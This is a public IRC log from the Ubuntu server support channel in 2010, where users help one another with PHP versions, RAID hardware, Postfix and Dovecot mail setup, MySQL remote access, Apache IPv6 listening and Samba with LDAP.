<SpamapS> 4 hours of downtime restoring backups means all your tuning failed. ;)
<SpamapS> patdk-wk: IIRC, federated was ported to drizzle
<patdk-wk> what I really want, and I just can't figure out, and just haven't bothered with a bug report yet on is
<SpamapS> oh the suspense
<saulus> I resolved the following reproduceable bug: If I install linux-vserver then my harddiscs are not recognized at boot.
<patdk-wk> I perfer to use percona's mysql build, instead of ubuntu's
<saulus> Since I need the virtual package for linux-vserver I need to solve the bug!
<ruben23> hi guys i ahve install ubuntu server 10 version but i got porblem my application dont run on php 5.3 it only run on php 5.2 any help how to downgrade
<patdk-wk> but if I use anything in ubuntu that uses mysql, it wants to wipe them out, and reinstall ubuntu mysql server
<patdk-wk> (like perl dbi)
<patdk-wk> SpamapS, sorry, really really hungry :)
<SpamapS> ruben23: that may be tricky!
<SpamapS> patdk-wk: is that because the percona packages don't provide the proper package names?
<ruben23> SpamapS: what could be my options for this..?
<SpamapS> ruben23: you could try forward-porting the php packages from 8.04...
<SpamapS> ruben23: but thats not going to be easy...
<SpamapS> ruben23: you could also compile a local copy of php just to get you by while you update your application
<ruben23> http://ubuntuforums.org/showthread.php?t=1459163 <----------------------i see a script here would this work..?
<SpamapS> ruben23: you might also be able to do it with "apt pinning".. but I'm not really very familiar with that concept.
<ruben23> does ubuntu 9.04 still install php5.3..? or php 5.2..?
<mathiaz> hallyn: nope - it's not possible to have personal blog auto-list under the ubuntu server blog
<mathiaz> hallyn: the ubuntu server blog is a blog on wordpress.com - not a planet style
<patdk-wk> spamaps, I think
<mathiaz> hallyn: an rss widget can be added to the blog to include your blog in the side bar
<patdk-wk> sorry, it's been a few months, so it's not fresh in my head the exact issue at the moment :(
<patdk-wk> maybe I need to file the bug with percona
<mathiaz> hallyn: but full articles won't be published on the blog (and thus not show in the rss feed)
<patdk-wk> why I haven't filed with anyone yet
<patdk-wk> and haven't had time to dig into it
<mathiaz> hallyn: what could be done though is to write up a copy-post script
<SpamapS> ruben23: https://launchpad.net/ubuntu/+source/php5 shows the versions for each release
<hallyn> mathiaz: ok, thanks - just wanted to make sure that i remebered right
<SpamapS> patdk-wk: the unholy marriage of libmysqlclient16 and mysqld is the problem
<patdk-wk> ya
<patdk-wk> I am not sure how to break it on ubuntu :)
<patdk-wk> I do on rhel all the time :)
<uvirtbot> New bug: #633364 in mysql-5.1 (main) "InnoDB should be the default table type" [Undecided,New] https://launchpad.net/bugs/633364
<SpamapS> mathiaz: can I add my blog to the side bars on ubuntu server too?
<mathiaz> SpamapS: yes
<mathiaz> SpamapS: go ahead
<SpamapS> mathiaz: btw, was that overstepping bounds posting the gluster write up to it?
<SpamapS> mathiaz: I figured since it was part of a blueprint it would be cool. :)
<SpamapS> mathiaz: oh, and I don't think I have rights to add or configure widgets
<mathiaz> SpamapS: what's your rss feed?
<SpamapS> http://fewbar.com/feed/
<mathiaz> SpamapS: done
<patdk-wk> hmm, kernel test request
<RoyK> patdk-wk: kernel test?
<RoAkSoAx> kirkland: howdy!! I was wondering if you've used SystemTAp before to examine KVM related stuff in the kernel?
<patdk-wk> !bug 608429
<uvirtbot> Launchpad bug 608429 in grub2 "black screen after grub menu" [Undecided,Fix released] https://launchpad.net/bugs/608429
<SpamapS> mathiaz: cool thanks!
<SpamapS> mathiaz: when you have a moment, I want to talk to you about javascript access to the launchpad API. :)
<Daviey> smoser, Are you around?
<zul> smooooooooooooseeeeeeeeeeeerrrrrrr
<smoser> well, of course i am.
<smoser> whats up mr Daviey
 * smoser twiddles thumbs
<Daviey> smoser, mumble?
 * smoser mumbles bad things about Daviey under his breath
<Daviey> pah
<patdk-wk> hmm, horible launchpad caching :(
<ScottK> Everything after launchpad was redundant.
<Pici> :(
<cemc> is there a way to run some route up commands when network manager brings up an interfaces?
<cemc> interface*
<SpamapS> cemc: /etc/network/if-up.d scripts will do what you need
<SpamapS> cemc: man interfaces  for more info
<cemc> SpamapS: thx
<sommer> mathiaz: just committed a new puppet section... won't be on doc.u.c until tomorrow though.
<pittstains1> anyone have thoughts about Dell RAID controllers?  i find myself in the unfortunate position of having to make a server purchase today, and I'm finding some reasonably priced refurbished Dells.  Having dealt with FakeRAID issues in the past (with other vendors), I'm hesitant to pull the trigger too fast.
<pittstains1> At minimum I need a RAID 1 mirror on real hardware RAID.
<pittstains1> The cards I'm seeing are PERC 4, 5, and 6
<SpamapS> pittstains1: I prefer HP's servers
<pittstains1> SpamapS: why?
<SpamapS> pittstains1: but DELL is my 2nd choice. They always have good linux drivers.
<SpamapS> pittstains1: Because HP's haven't ever failed me. :) (I should say compaq's .. proliant good, netserver, bead
<SpamapS> s/bead/bad/
<pittstains1> i won't be buying directly from Dell, though, so I might just be getting the machine and no disks
<ScottK> Dell has all their drivers and such online.
<aetaric> SpamapS: Dell is much better than HP
<pittstains1> ha, didn't mean to start a religious war, just want to make sure if i get a PERC 3 that I'll be able to do a true hardware RAID
<aetaric> pittstains1: as for the dell PowerEdge Raid Controllers. they are great
<aetaric> 3 dc?
<aetaric> or...
<aetaric> infact....waht model dell is that?
<pittstains1> Dell PERC 3/Di Hardware RAID with 128MB Cache
<aetaric> mmmmm
<pittstains1> PowerEdge 2650
<SpamapS> aetaric: I don't think I said HP is better
<SpamapS> aetaric: I would never. They're way too complex to pass an ultimate judgement like that.
<aetaric> pittstains1: great server
<SpamapS> aetaric: I just prefer HP. :)
<aetaric> SpamapS: never said you did pass judgement. i was just informing you that dells are better :p
<pittstains1> I'm also looking at a Dell PowerEdge 840, which sports a Dell PERC 5I RAID Controller
<aetaric> but hp's are good too
<aetaric> i have a 6650 with a PERC 3/DC it's pretty awesome
<SpamapS> aetaric: you're going to have to back that up with facts. ;)
<pittstains1> i might just have to do it for the price, then
<aetaric> SpamapS: like the fact that every company i have ever worked for almost never had a bad server from dell
<pittstains1> i just don't want to deal with fakeRAID again -- you know what i mean?
<aetaric> yeah.. fake raid is fail
<SpamapS> aetaric: that is entirely subjective. Like my preference, its not really an objective case where you can say that they're better. You've just had more subjective experience, so you prefer them.
<aetaric> go raid 10 or raid 50..... if you get the perc 5 card and raid 5 if ou get the 3
<aetaric> SpamapS: maybe.
<aetaric> i also prefer to have a dell employee replace parts on servers for me
<pittstains1> i think i like RAID 1 because it's cheaper and faster
<pittstains1> RAID 5 gets slow
<pittstains1> and requires more than 2 disks :-)
<SpamapS> thats sort of a false assumption
<veenenen> Anyone have any experience wrapping up local ubuntu server images to send to ec2?
<SpamapS> the slow part. ;)
<pittstains1> ah
<pittstains1> i was going to ask
<aetaric> pittstains1: yeah you really can't notice a speed diff.
<pittstains1> i think it's fairly well documented that RAID 1 is faster than RAID 5, but I should add that I'm really a programmer masquerading as a sysadmin
<SpamapS> veenenen: many in here have, but you may want to check out #ubuntu-cloud too
<pittstains1> and that i try to stay away from the hardware as much as possible
<SpamapS> pittstains1: there are dedicated RAID5 controllers w/ battery backed write cache that will *destroy* RAID1 for multi-threaded I/O
<aetaric> the perc cards are really better for raid 5
<pittstains1> SpamapS: perhaps, but that doesn't sound cheap :-)
<aetaric> all 19 of my server's drives are in raid 5 arrays
<SpamapS> Yeah, RAID50 with 14 disks kills RAID10 with 14 disks in HP's SmartARray cards, as long as you have battery backed write cache.;)
<aetaric> pittstains1: the 2650 is battery backed
<aetaric> heh that is the 2U sister system to my model
<pittstains1> well, i did it.  i bought the 2650.
<pittstains1> thanks for your help, ladies and gents
 * RoyK hands out Fedora CDs for the masochists
<Tim_R> can anybody tell me how can I remove this link: http://mail.nwohiobb.com/squirrelmail/src/login.php just go back to mail.nwohiobb.com
<SpamapS> Tim_R: are you running Apache?
<Tim_R> yes I am SpampS
<SpamapS> Tim_R: Redirect ... http://httpd.apache.org/docs/2.2/mod/mod_alias.html#redirect
<SpamapS> probably something like     Redirect permanent /squirrelmail/src/login.php /
<SpamapS> You can probably just do   Redirect permanent /squirrelmail/ /
<SpamapS> if you're shutting down squirrel
<Tim_R> yea I want to shut down squirrel
<SpamapS> Tim_R: that goes in whatever config file you've used to configure mail.nwohiobb.com
 * SpamapS must be going now
<SpamapS> Tim_R: good luck
<mdeslaur> mathiaz: any idea if LP: #423252 is going to be fixed soon?
<mdeslaur> zul: ^
<Tim_R> well that didnt work
<Tim_R> any other ideas
<zul> mdeslaur: umm...
<zul> mathiaz: ^^^
<veenenen> I'm not seeing a ton of response from the ubuntu-cloud chat room. Anyone here know how to get a kvm guest machine transfered onto ec2?
<uvirtbot> New bug: #633516 in unixodbc (main) "package odbcinst 2.2.11-21 failed to install/upgrade: " [Undecided,New] https://launchpad.net/bugs/633516
<uvirtbot> New bug: #633521 in unixodbc (main) "package odbcinst1debian1 2.2.11-21 failed to install/upgrade: " [Undecided,New] https://launchpad.net/bugs/633521
<uvirtbot> New bug: #633523 in unixodbc (main) "package unixodbc 2.2.11-21 failed to install/upgrade: " [Undecided,New] https://launchpad.net/bugs/633523
<clayd> i am trying to download vmware server and was wondering if there is a way to download it dirrectly from the command line?  I am using ubuntu server 10.04 and cant seen to figure out how to make wget work.
<qman__> clayd, the last time I tried, you had to sign up for an account and apply for keys first
<qman__> then they gave you a download dlink
<qman__> free to use but strings attached
<clayd> thats what i thought but the link you get from them doesnt work.  the bad part is that someone a while ago told me about a command line tool that allowed me to see a text version of the vmware site.  yep i forgot the name of the tool
<qman__> probably links or some variation thereof
<qman__> such as elinks, links2, or lynx
<clayd> i think it was links.  that sounds right.
<clayd> i will try it .  thanks
<clayd> yep that was it.  thank a ton qman
<qman__> suggest elinks
<uvirtbot> New bug: #633568 in dhcp3 (main) "dhclient3 not recognize -4 option sent by network manager" [Undecided,New] https://launchpad.net/bugs/633568
<_Neytiri_> i am haveing issues connectiong to my mysql server remotely and mysql is correctly setup and so is the user i am trying to connect with
<DrNick_> when you say mysql is correctly setup, i assume you mean you have added a user for the host you wish to connect from?
<_Neytiri_> yes
<_Neytiri_> i set it as a % host
<DrNick_> did you do a FLUSH PRIVILEGES;?
<_Neytiri_> yes i believe so
<_Neytiri_> but i cant even connecto to mysql from the local machine usieng the addres of the interface card
<DrNick_> check your my.conf to ensure the server is actually listening on the right IP/interface?
<_Neytiri_> that i didnt
<DrNick_> by default it listens on the loopback interface only I believe
<DrNick_> it's a security thing
<_Neytiri_> ok  where do i find that?
<DrNick_>  /etc/mysql/my.conf?
<_Neytiri_> can i set mysql to listen on any address the machine gets?
<DrNick_> you can set it to listen to a certain interface i believe yes
<_Neytiri_> i cant eneter a 0.0.0.0 or 255.255.255.255
<DrNick_> think it might say so in the comments for the config file... I thought you can just enter eth0 or whatever
<_Neytiri_> got it ty
<dollarbang1> hello all, I'm new to Ubuntu (and Linux for that matter). I'm trying to get a server running. I have (somewhat) successfully gotten Ubuntu 10.04 up and running, but the mouse isn't working. The PC has one PS/2 port that I have the keyboard hooked up to. I have the mouse hooked up to a USB port. Any suggestions (including RTFM is ok, but where). Thanks.
<DrNick_> i assume you have a GUI installed then?
<dollarbang1> DrNick: yes.
<dollarbang1> I opened a terminal session, and executed "lsusb", the settings do not show a USB mouse is loaded. Only the default display.
<DrNick_> do you have the desktop version of ubuntu installed?
<dollarbang1> DrNick: I downloaded the server edition, not the workstation.
<dollarbang1> DrNick: I was on the Ubuntu channel, and they thought that Ubuntu Server didn't have a GUI version.
<DrNick_> so if you downloaded the server version was that what you installed?
<dollarbang1> DrNick: yes
<DrNick_> soo... you don't have a GUI then.
<dollarbang1> DrNick: No, there is a GUI window. (I have issues with negative logic).
<JanC> dollarbang1: you installed a GUI afterwards?
<dollarbang1> JanC: No, that was the default installation.
<JanC> Ubuntu Server has no GUI by default
<JanC> maybe you have Edubuntu?
<JanC> Edubuntu terminal server has a GUI
<JanC> anyway, lsusb should show your mouse if the _hardware_ detects it, maybe it's broken?
<dollarbang1> JanC: right now, I'm even questioning if I'm awake. I downloaded the 10.04 ISO from Ubuntu, used the "install from a Memory Stick" instead of creating a CD, the ran the installation from the USB Stick. Everything looked like it was working, I just never looked to see the mouse was having any problems, nor did I look at the installation log to see if it had problems.
<dollarbang1> JanC: Once it finished installing the software, I removed the memory stick, and rebooted the PC, the GUI loaded after I entered my password.
<mathiaz> mdeslaur: re bug 423252 - I don't know
<uvirtbot> Launchpad bug 423252 in sudo "NSS using LDAP+SSL breaks setuid applications like su and sudo" [High,Confirmed] https://launchpad.net/bugs/423252
<mathiaz> mdeslaur: I haven't looked at the bug for some time now
<mathiaz> SpamapS: what's up with javascript + LP API?
<mdeslaur> mathiaz: :(
#ubuntu-server 2010-09-09
<SpamapS> mathiaz: I'm just wondering if we can do a lot of the dashboard stuff you want to do given that there should be a proxy to api.launchpad.net on people.canonical.com soon.
<mathiaz> SpamapS: cool - IIUC I could query LP API directly from javascript with a page hosted on people.canonical.com?
<SpamapS> mathiaz: exactly
<SpamapS> mathiaz: public data only tho
<mathiaz> SpamapS: which point on the document we'd have to use? https://help.launchpad.net/API/
<mathiaz> SpamapS: the second one?
<mathiaz> SpamapS: Users who aren't Python programmers, or who are interested in the inner workings of the web service, ?
<mathiaz> SpamapS: and thus https://help.launchpad.net/API/Hacking?
<SpamapS> mathiaz: yes
<SpamapS> mathiaz: tho I found some things in that out of date
<SpamapS> https://api.launchpad.net/1.0/ubuntu?ws.op=searchTasks&assignee=https://api.launchpad.net/1.0/~mathiaz
<SpamapS> mathiaz: so you'll be able to get access to that from javascript..
<mathiaz> SpamapS: nice :)
<mathiaz> SpamapS: now we just need to rewrite launchpadlib from python to javascript ;)
<mathiaz> SpamapS: or rather - port it
<SpamapS> mathiaz: should work nicely as a jquery plugin
<mathiaz> SpamapS: :)
<SpamapS> mathiaz: the real power will come when JSONP is available though
<mathiaz> SpamapS: how about a YUI plugin?
<SpamapS> then projects can put their bug list on their front page...
<mathiaz> SpamapS: IIRC YUI is the preferred javascript framework for LP and other sites
<SpamapS> YUI and jquery are not really mutually exclusive
<\sh> mathiaz, use qooxdoo as frontend js lib and you have launchpad as desktop app inside the browser...json-rpc as backend...and there you go
<\sh> no need for ugly YUI or jquery
<Tim_R> could anybody help me move squirrelmail to a different link
<Tim_R> because right now its set at http://mail.nwohiobb.com/squirrelmail/src/login.php and I want mail.nwohiobb.com/rc to replace it
<oat> Hi all: I need some help with irqbalance on 10.04 server. Can anyone suggest me sth, please?
<oat> Seem to be so quiet.
<oat> Everybody's gone to bed?
<lifeless> you haven't really asked a question
<uvirtbot> New bug: #633723 in samba (main) "samba-common-bin package won't install properly through package manager" [Undecided,New] https://launchpad.net/bugs/633723
<twb> Can munin (or something LIKE munin) be told to emit SVG graphs instead of PNG ones?
<twb> Hmm, it uses rrdtool, which allegedly grew support for emitting EPS/PDF/SVG in 1.1 (Apr 2005).
<SJr> How do I get a list of all currently installed packages
<SJr> so that I can reinstall them
<chrismsnz> SJr: dpkg -i will list all currently installed packages
<chrismsnz> SJr: sorry, i meant "dpkg -l"
<twb> dpkg --get-selections
<twb> -l is mainly for humans; --get and --set can be used as a pipeline
<twb> e.g. ssh fs dpkg --get-selections | ssh newfs dpkg --set-selections; ssh newfs -t aptitude install -y
<chrismsnz> ... will show you a list of packages specifically installed (i.e. not as a dependency), right?
<chrismsnz> probably what he was after :)
<SJr> oh thanks
<SJr> that is way better than I would have expected
<twb> chrismsnz: try it :P
<twb> chrismsnz: dpkg --get-selections lists *all* installed packages
<SJr> will that work even if some packages aren't the same
<chrismsnz> righto
<twb> "auto-installedness" is something that only occurs above dpkg's level of visibility -- historically in aptitude, but also now in apt as at 0.8
<twb> (In /var/lib/apt/extended_states)
<twb> To list all manually-requested packages, you would want a query along these lines:
<twb> aptitude search --disable-columns -F%p '?installed ?not(?automatic)'
<sjr_> My system just died
<sjr_> can you repeat those commands :)
<twb> http://paste.debian.net/88756/
<sjr_> dankeshen
<twb> Guess what I just found
<twb> apt-mark showauto
<sjr_> it's a shame I'm already in the process of reformating, Mr. TWD
<sjr_> TWB
<uvirtbot> New bug: #633789 in bacula (main) "package bacula-director-mysql 5.0.1-1ubuntu1 failed to install/upgrade: subprocess installed post-installation script returned error exit status 1" [Undecided,New] https://launchpad.net/bugs/633789
<t3cki3> hey poeple.. i need help with samba on my ubuntu machine
<sjr_> what do you need to know?
<t3cki3> is this the right place or do i need to go to the samba room ?? please let me know... thanks in advance
<t3cki3> i have installed swat, and i have configured it.. i just need to share a folder
<t3cki3> not too familliar with SWAT for SAMBA
<uvirtbot> New bug: #633811 in irqbalance (main) "package irqbalance 0.56-0ubuntu2 failed to install/upgrade: ErrorMessage: failed to read on buffer copy for md5hash: Input/output error" [Undecided,New] https://launchpad.net/bugs/633811
<WalterN> ok. I think I have dovecot and postfix mostly set up, also have reverse DNS for my domain name...
<WalterN> now.. how do I actually add an email account?
<WalterN> went though https://help.ubuntu.com/10.04/serverguide/C/postfix.html
<jmarsden> WalterN: If you set it up in the default fashion, every user on your machine *is* an email account.
<WalterN> and https://help.ubuntu.com/10.04/serverguide/C/dovecot-server.html
<WalterN> jmarsden: what does that mean?
<jmarsden> If you want more email users, add more Unix users... there is no difference, unless you configured postfix and dovecot for virtual domains etc etc.
<jmarsden> Have you tried sending email to walter@yourdomain.com from some other system?  (if you log in to your Ubuntu server as walter)
<jmarsden> WalterN: If you want, tell me your domain name and username and I'll send you a test email :)
<WalterN> server and tiwake.com... but that failed..
<jmarsden> tiwake.com has an MX that points to smtp.secureserver.net.
<WalterN> do I need to add a subdomain or something called server?
<jmarsden> So email to user@tiwake.com will go there, not to your machine
<jmarsden> If your server is to be the email server for the tiwake.com domain, you need to edit that MX record to tell the Internet to send email for tiwake.com to your server, not to smtp.secureserver.net.
<WalterN> oh I see, was wondering about that..
<WalterN> ok, changed that... how long do I need to wait?
<WalterN> like an hour or whatever like other changes made?
<WalterN> wait
<WalterN> jmarsden: how did you find out that MX record stuff?
<jmarsden> I used dig.
<jmarsden> dig tiwake.com mx
<sjr_> How do I scann for disks without rebooting
<jmarsden> Um.  Looks like you failed to configure your server to accept email for tiwake.com.  My mailserver log shows:
<jmarsden> Sep  8 23:27:29 eclipse5 postfix/smtp[15113]: 5262156823C: to=<walter@tiwake.com>, relay=tiwake.com[69.145.84.198]:25, delay=2.5, delays=0.01/0/2.2/0.26, dsn=5.7.1, status=bounced (host tiwake.com[69.145.84.198] said: 554 5.7.1 <walter@tiwake.com>: Relay access denied (in reply to RCPT TO command))
<WalterN> server@tiwake.com
<WalterN> server is the username... heh
<jmarsden> Makes no difference, it didn't say user unknown, it said relaying denied... read the message :)
<jmarsden> "Relay access denied" ... it does not believe it *is* tiwake.com, so it wanted to relay the email elsewhere...
<WalterN> postfix problem?
<jmarsden> Postfix configuration problem, yes.
<WalterN> what should myhostname be?
<WalterN> in postfix/main.cf
<jmarsden> Your host name.  somename.tiwake.com, probably.  pastebin me the output of postfix -n somewhere and I'll look through it.
<WalterN> http://pastebin.com/yHRzbC1K
<WalterN> jmarsden: should line 34 be tiwake.com instead of mail.tiwake.com?
<jmarsden> Yes, either instead of or in addition to.
<WalterN> is that the problem though?
<jmarsden> Probably.  Fix it and reload postfix, and I'll retest for you.
<WalterN> ok, so I added tiwake.com to that list
<jmarsden> and reloaded postfix?
<WalterN> done
<jmarsden> Tested, that worked, you should have my test email now.
<WalterN> hmm
<WalterN> now to find out where it is
<jmarsden> Type mail or mutt or whatever email program you run on the server!
<WalterN> havent yet
<jmarsden> If desperate, try    less $MAIL
<WalterN> hmm
<WalterN> using the default email account
<WalterN> erm
<WalterN> email client, evolution
<jmarsden> There is no such thing as a "default email account".  Evolution?  On a server???  What are you doing running GUI clients on a server?
<WalterN> heh
<WalterN> cause I can
<jmarsden> Wastes RAM and lowers system security.  The Ubuntu Server install does not install a GUI.  By design.
<WalterN> so on the receiving email section in evolution, what do I put in for server?
<WalterN> just my domain name?
<SpamapS> jmarsden: it could raise system security. What if he wants to run an isolated "off network" server?
<jmarsden> Given that he wants it to receive email from the Internet, which I just helped him configure, that seems... unlikely.
<SpamapS> the biggest threat to the server is probably the network port, not a GUI. :)
<jmarsden> Cool, you can help him with Evolution then :)
 * SpamapS could if he weren't.. sooo.. tired... yaawwwwn
<WalterN> heh
<WalterN> hmm
<WalterN> mail_location = mbox:~/mail:INBOX=/var/spool/mail/%u
<WalterN> there is nothing in that file :/
<jmarsden> Did you configure dovecot for Maildir inboxes?  less /var/spool/mail/server really shows an empty file?
<WalterN> nothing in that file
<jmarsden> And... Did you configure dovecot for Maildir inboxes?
<WalterN> no, mbox
<jmarsden> Seems odd.  Read your server logs.  Your server told mine that it accepted the email from me...
<jmarsden> Sep  8 23:47:09 eclipse5 postfix/smtp[25576]: 4D01756838D: to=<server@tiwake.com>, relay=tiwake.com[69.145.84.198]:25, delay=2.1, delays=0.02/0/1.4/0.7, dsn=2.0.0, status=sent (250 2.0.0 Ok: queued as 87844C22C8)
<WalterN> interesting... there is my email.. says it saved it
<WalterN> http://pastebin.com/vwmqG8J8
<jmarsden> OK, so it handed it to deliver.  So where did deliver put it?  Check (and pastebin) your dovecot.conf file.  BTW, I'm not going to stay awake/at the keyboard much longer :)
<WalterN> http://pastebin.com/z4STKNZ0
<jmarsden> OK.  What does    less ~server/mbox   show you?
<WalterN> heh, no such file or directory
<jmarsden> OK, any sign of ~server/mail
<WalterN> there is a ~server/mail/.imap/inbox/dovecot.index.log
<WalterN> thats it
<WalterN> at the bottom of the dovecot config file should be where its saving the file though
<WalterN> line 1287
<jmarsden> OK... I'm out of time, I'm afraid.  I agree, but it doesn't seem to be there now.  So either it was put somewhere else, or something (Evolution? some other email client?) already grabbed it and did whatever it wanted to with it.
<jmarsden> Goodnight.
<WalterN> TTFN, thanks
<twister004> guys please confirm.. samba is used to mount windows dirs in linux env?.. or the other way round?
<mamac> twister004, with samba you can share data on linux server so windows clients can access to it
<mamac> you can also share printers with samba
<G> and you can also, as twister004 said, use the Samba client to mount Windows shares....
<ruben23> guys i have installed linux-source but i ncat find the file of the linux source.
<ruben23> i do this --> apt-get install linux-source
<mamac> isn't linux-source kernel sources?
<ruben23> mamac: but where can i find its file..?
<G> ruben23: what are you trying to do?
<G> i.e. what type of file are you after?
<ruben23> im installing an asterisk application whihc require kernel source, and during install it says cant find any kernel sources on my system
<G> ruben23: grab the linux-headers package
<ruben23>  G: how to do that..? where i get it..?
<ruben23> http://pastebin.com/9mrKHrQp <----------i got this error
<ruben23> http://pastebin.com/ELNWAGnb
<ruben23> http://pastebin.com/rL02ZyDM
<ruben23>  G:  what could be the problem
<mamac> ruben23, what is the output of uname -r ?
<ruben23> 2.6.32-24-server
<ruben23> i cant fine any files like linux source.
<mamac> what version of linux headers is installed ?
<uvirtbot> New bug: #633891 in samba (main) "package samba 2:3.4.0-3ubuntu5.6 failed to install/upgrade:" [Undecided,New] https://launchpad.net/bugs/633891
<timmillwood> looking for a great place to back out office nas & internal dev server to. currently use s3 and s3sync, but seems a bit unreliable and not easy to monitor.
<jrib> timmillwood: me too :)
<timmillwood> jrib: found anything good?
<sherr> timmillwood: By "back out" you mean transfer to the "cloud"?
<jrib> timmillwood: I have not.  Like you I was looking for some trusted recommendations
<timmillwood> sherr: by "back out" I mean "backup"
<jrib> timmillwood: I'm just looking for a place I can use rsnapshot with
<sherr> There are many hosting providers around. I've used Fasthosts for a year (RHEL5) without problems. Also look at Linode, Rackspace etc.
<uvirtbot> New bug: #633912 in mysql-5.1 (main) "Ubuntu 10.04 ./. MySQL ./. Konfiguring InnoDB-Plugin for MySQL will not work, because of AppArmor" [Undecided,New] https://launchpad.net/bugs/633912
<gathraigin> Hi
<lool> Hmm for some reason, lucid's apache2 doesn't seem to listen to v6 addresses by default for me
<lool> I can't figure out why though
<Patrickdk> strange, it works fine here, lucid apache2 on 6 different machines using ipv6 (4 of them are just default installs no configuration just for testing different things)
<lool> So I created a lucid virtual machine with vm-builder on lucid
<lool> added a virtualhost
<lool> and wget http://ip6-localhost doens't work, while localhost works
<lool> I don't have any public ipv6 address in this vm, but I do have ::1
<lool> I wonder if that's the reason
<cemc> how's vserver support in 10.04 ?
<Patrickdk> heh, works fine on mine
<Patrickdk> wget ip6-localhost
<Patrickdk> did you check your /etc/hosts file and make sure ip6-localhost was defined correctly?
<Patrickdk> or did you modify the ip's that apache binds to?
<lool> Patrickdk: I left the default; yes, it's defined to ::1
<lool> I didn't touch the IP apache2 binds to
<lool> I did try to once looking into the problem, but I actually didn't manage to pass an IPv6 with Listen [::1]:80, it got rejected
<jpds> lool: What does "netstat -ltun | grep 80" show?
<lool> jpds: tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN
<lool> (and some :8080 listeners)
<jpds> lool: Hmm, no tcp6? :::80 ?
<lool> jpds: Exactly, no tcp6; the :8080 java process has a tcp6 though tcp6       0      0 :::8080                 :::*                    LISTEN
<lool> and I can connect to http://ip6-localhost:8080 fine
<lool> so at least it's not the system, but really just apache2
<jpds> lool: Is your VirtualHost declartion: *:80 ?
<lool> jpds: the virtualhost itself has: <VirtualHost *:80>
<jpds> Hmm.
<lool> apache2 has the defaults in ports.conf:
<lool> NameVirtualHost *:80
<lool> Listen 80
<lool> the default virtualhost has <VirtualHost *:80>
<lool> aha, on the host server, w3m http://ip6-localhost works
<lool> so either I have a small config difference, or the routing does matter
<lool> Yes
<lool> I added a routable ipv6 to the vm with ip addr add 2a01:e35:8a6e:xxxxxxxx/64 dev eth0
<lool> and that worked after restarting apache2
<lool> jpds, Patrickdk: ^
<jpds> Ah, native v6 from Free, nice.
<lool> well I don't actually propagate it to that vm, just having some route probably changed glibc's or apache2's behavior
<JeffP-BR> Hello All. I'm in trouble installing Ubuntu Server from a pen drive in a machine without cdrom drive. The boot process is ok but the ubuntu installer stay asking for a CD rom drive. How to solve this issue?
<pmatulis> JeffP-BR: which release?
<JeffP-BR> pmatulis, I'm trying 10.10 Server.
<pmatulis>  JeffP-BR: maybe a regression of bug 403560
<uvirtbot> Launchpad bug 403560 in debian-installer "[Karmic] Cannot install from USB device" [Undecided,Fix released] https://launchpad.net/bugs/403560
<pmatulis> JeffP-BR: maybe ask in #ubuntu-installer
<pmatulis> or #ubuntu+1
<JeffP-BR> Thanks pmatulis I'll look this.
<patdk-wk> lool, heh? you attempted to connect to localhost on that vm, from a different machine? that so isn't going work :)
<lool> patdk-wk: No, I attempted to connected to the same vm using IPv6
<lool> in fact, I'm using the vm's own hostname
<lool> e.g. wget http://$host/file
<lool> and that first warns because IPv6 fails, then uses IPv4
<patdk-wk> "aha, on the host server, w3m http://ip6-localhost works
<patdk-wk>  so either I have a small config difference, or the routing does matter"
<patdk-wk> I guess I totally don't understand what you where saying
<lool> patdk-wk: The bug is in a vm
<lool> patdk-wk: I don't have the bug outside of the vm, on the host, which also runs apache2
<patdk-wk> what kind of vm?
<lool> patdk-wk: The reason I don't is because the host has ipv6 connectivity, while the vm has not
<patdk-wk> well, by definition, it shouldn't make a difference
<patdk-wk> but it doesn't sound like your using a real vm
<patdk-wk> psudo-vm?
<patdk-wk> I know openvm has all kinds of ipv6 issues
<patdk-wk> I haven't had any issues at all with vmware or xen
<lool> patdk-wk: I'm using a kvm
<lool> I just finished filing LP #633981 on this issue
<uvirtbot> Launchpad bug 633981 in apache2 "apache2 doens't listen on ::1 when there is no routable IPv6 address" [Undecided,New] https://launchpad.net/bugs/633981
<patdk-wk> hmm, I don't know much about kvm
<lool> patdk-wk: I don't think it relates to the type of vm, the problem is in userspace since adding an ipv6 address causes apache2 to listen
<lool> and other software on the same host behaves fine
<patdk-wk> if that was the case, I would have the same issue on 4 vm's
<lool> patdk-wk: Indeed, you don't?
<patdk-wk> nope, never have had an issue
<lool> patdk-wk: this is on lucid; w3m http://ip6-localhost doesn't work in the default config
<lool> patdk-wk: Do your vm have routable ipv6 addresses?
<patdk-wk> yep
<patdk-wk> I guess I could disable them all
<patdk-wk> but as I'm using radvd on the network, that isn't so easy
<lool> patdk-wk: Well you confirm my experience then, since you do have routable addresses in your vms, it works
<lool> I don't which is why it doens't work
<lool> I don't run radvd on the host; the host itself has ipv6, and the vm have link-local ipv6 to the post and node-local ipv6 (::1)
<uvirtbot> New bug: #633981 in apache2 (main) "apache2 doens't listen on ::1 when there is no routable IPv6 address" [Undecided,New] https://launchpad.net/bugs/633981
<ssureshot> does the packaged tomcat6 installation in lucid work out of the box or does it need tweaked like in karmic
<incorrect> what causes a system to appear in nautilus's network:// list?
<incorrect> there doesn't seem to be a really good solution to share files between win/mac and linux,  i've found webdav to work pretty well, but i don't see a way to do user directories
<giovani> incorrect: samba is typically the method used
<incorrect> giovani, hence i said 'really good'
<giovani> incorrect: webdav is definitely not better than samba
<giovani> for file sharing
<incorrect> samba has issues, such as i can't easily use user accounts from my ldap server
<patdk-wk> I have never had issues with samba, works fine
<incorrect> well my bench marks would suggest otherwise
<giovani> incorrect: really? we do it here quite easily ...
<patdk-wk> ya, you can use ldap directly with samba
<patdk-wk> or use it via nsswitch
<incorrect> do you disable encrypted passwords?
<patdk-wk> nope
<incorrect> then how do you auth users?
<incorrect> you must have a split password problem
<patdk-wk> hmm, I should check, it just worked :)
<patdk-wk> encrypt passwords = true
<giovani> incorrect: I don't know why you think you can't encrypt passwords over the wire and still use LDAP as a backend
<incorrect> giovani, because of the way it stores the password,
<giovani> the way what stores the password?
<incorrect> you need to load on another schema to ldap to store its password
<giovani> you're not being clear or specific
<incorrect> ok let me dig out the info
<incorrect> you have to load /etc/ldap/schema/samba.schema
<incorrect> this gives you another field in which your smb password is stored
<incorrect> so if you do passwd it changes another field leaving your smb password split
<giovani> not if you're using pam/nsswitch to handle ldap auth
<giovani> which is the logical method
<incorrect> and that will change the smbpasswd field too?
<giovani> no, you don't need a separate field
<giovani> because the system is authing against the regular password field
<incorrect> ok so i shouldn't need that schema
<MagicFab> JeffP-BR, still around ?
<MagicFab> pmatulis, this is what I mentioned earlier: http://identi.ca/notice/48740857
